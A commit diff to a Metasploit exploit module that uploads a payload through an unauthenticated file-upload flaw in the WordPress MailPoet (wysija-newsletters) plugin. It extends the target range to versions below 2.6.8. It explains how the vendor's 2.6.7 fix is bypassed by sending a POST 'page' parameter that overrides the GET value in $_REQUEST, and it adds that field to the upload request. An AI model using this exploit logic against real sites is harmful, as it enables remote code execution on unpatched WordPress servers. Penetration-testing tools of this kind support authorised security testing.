Land rapid7#3494, @firefart's update for Mailpoet's exploit

jvazquez-r7 · jvazquez-r7 · commit 5e7f356f3155 · 2014-07-06T11:27:18.000-05:00
diff --git a/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb b/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb
@@ -15,11 +15,16 @@ def initialize(info = {})
     super(update_info(info,
       'Name'           => 'Wordpress MailPoet (wysija-newsletters) Unauthenticated File Upload',
       'Description'    => %q{
-          The Wordpress plugin "MailPoet Newsletters" (wysija-newsletters) before 2.6.7
+          The Wordpress plugin "MailPoet Newsletters" (wysija-newsletters) before 2.6.8
           is vulnerable to an unauthenticated file upload. The exploit uses the Upload Theme
           functionality to upload a zip file containing the payload. The plugin used the
           admin_init hook, which is also executed for unauthenticated users when accessing
-          a specific URL.
+          a specific URL. The developers tried to fix the vulnerablility
+          in version 2.6.7 but the fix can be bypassed. In PHPs default configuration,
+          a POST variable overwrites a GET variable in the $_REQUEST array. The plugin
+          uses $_REQUEST to check for access rights. By setting the POST parameter to
+          something not beginning with 'wysija_', the check is bypassed. Wordpress uses
+          the $_GET array to determine the page and is so not affected by this.
       },
       'Author'         =>
         [
@@ -29,12 +34,14 @@ def initialize(info = {})
       'License'        => MSF_LICENSE,
       'References'     =>
         [
-          [ 'URL', 'http://blog.sucuri.net/2014/07/remote-file-upload-vulnerability-on-mailpoet-wysija-newsletters.html' ]
+          [ 'URL', 'http://blog.sucuri.net/2014/07/remote-file-upload-vulnerability-on-mailpoet-wysija-newsletters.html' ],
+          [ 'URL', 'http://www.mailpoet.com/security-update-part-2/'],
+          [ 'URL', 'https://plugins.trac.wordpress.org/changeset/943427/wysija-newsletters/trunk/helpers/back.php']
         ],
       'Privileged'     => false,
       'Platform'       => ['php'],
       'Arch'           => ARCH_PHP,
-      'Targets'        => [ ['wysija-newsletters < 2.6.7', {}] ],
+      'Targets'        => [ ['wysija-newsletters < 2.6.8', {}] ],
       'DefaultTarget'  => 0,
       'DisclosureDate' => 'Jul 1 2014'))
   end
@@ -81,7 +88,7 @@ def check
 
     print_status("#{peer} - Found version #{version} of the plugin")
 
-    if Gem::Version.new(version) < Gem::Version.new('2.6.7')
+    if Gem::Version.new(version) < Gem::Version.new('2.6.8')
       return Msf::Exploit::CheckCode::Appears
     else
       return Msf::Exploit::CheckCode::Safe
@@ -101,6 +108,7 @@ def exploit
     data.add_part('on', nil, nil, 'form-data; name="overwriteexistingtheme"')
     data.add_part('themeupload', nil, nil, 'form-data; name="action"')
     data.add_part('Upload', nil, nil, 'form-data; name="submitter"')
+    data.add_part(rand_text_alpha(10), nil, nil, 'form-data; name="page"')
     post_data = data.to_s
 
     payload_uri = normalize_uri(target_uri.path, 'wp-content', 'uploads', 'wysija', 'themes', theme_name, payload_name)
